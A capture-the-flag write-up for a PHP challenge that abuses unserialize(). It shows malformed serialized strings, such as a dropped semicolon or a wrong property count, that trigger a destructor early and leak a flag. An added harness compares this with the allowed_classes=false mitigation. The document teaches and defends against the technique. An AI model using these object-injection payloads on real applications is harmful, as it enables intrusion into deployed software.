https://ctftime.org/task/7404
PHP's unserialization mechanism can be exceptional.
Program code:
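<?php
// Read one line of user-controlled input.
$line = trim(fgets(STDIN));
$flag = file_get_contents('/flag');

class B {
    // The flag is printed only when a B instance is destroyed.
    function __destruct() {
        global $flag;
        echo $flag;
    }
}

$a = @unserialize($line);

throw new Exception('Well that was unexpected…');

echo $a; // never reached: the exception above is always thrown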
We use the following code to produce a normal serialized string:
<?php
class B { }

// An array with a B instance in the middle.
$a = array(1, 2, new B(), 3, 4);
echo serialize($a);
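The code above produces the serialized array a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4;}. Remove the final semicolon so that it becomes a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4}, then send that string to the PHP program and the flag is displayed.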
<?php
class B { }

// Serialize a single B instance.
$test = new B();
$serialize_test = serialize($test);
echo $serialize_test;
The code above produces the string O:1:"B":0:{}. Change the 0 to 1 so that it becomes O:1:"B":1:{}; sending this string to the PHP program also yields the flag.
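The check below is an added example, not part of the challenge or the original write-up: it feeds the four strings above to unserialize() and records whether B's destructor has already run by the time the call returns, first with default options and then with allowed_classes set to false, which keeps B from being instantiated at all. The probe() helper and the counter on B are assumptions made for the demonstration; B here counts destructor calls instead of echoing a flag.

```php
<?php
// Added example, not the challenge's code. B stands in for the challenge
// class: its destructor counts calls instead of echoing a flag.
class B {
    public static $destructed = 0;
    function __destruct() { self::$destructed++; }
}

// Hypothetical helper: unserialize $payload and report whether
// B::__destruct() had already run when unserialize() returned, i.e. before
// the challenge script would reach its `throw`.
function probe(string $payload, array $options = []): array {
    B::$destructed = 0;
    $value = @unserialize($payload, $options);
    return [
        'returned_false'   => $value === false,
        'type'             => is_object($value) ? get_class($value) : gettype($value),
        'destructed_early' => B::$destructed > 0, // $value is still alive here
    ];
}

// The four strings from the write-up: two well-formed, two malformed.
$payloads = [
    'array, well-formed'  => 'a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4;}',
    'array, no final ";"' => 'a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4}',
    'object, well-formed' => 'O:1:"B":0:{}',
    'object, count 0->1'  => 'O:1:"B":1:{}',
];

// Default behaviour next to the hardened call that refuses to build objects.
$modes = [
    'default'               => [],
    'allowed_classes=false' => ['allowed_classes' => false],
];

foreach ($modes as $mode => $options) {
    echo "== $mode ==\n";
    foreach ($payloads as $label => $payload) {
        $r = probe($payload, $options);
        printf("%-22s returned_false=%d destructed_early=%d type=%s\n",
            $label, (int) $r['returned_false'], (int) $r['destructed_early'], $r['type']);
    }
}
```

A row with destructed_early=1 means the destructor ran inside unserialize(), before any code after the call; with allowed_classes set to false the object is created as __PHP_Incomplete_Class, so B::__destruct() is never involved.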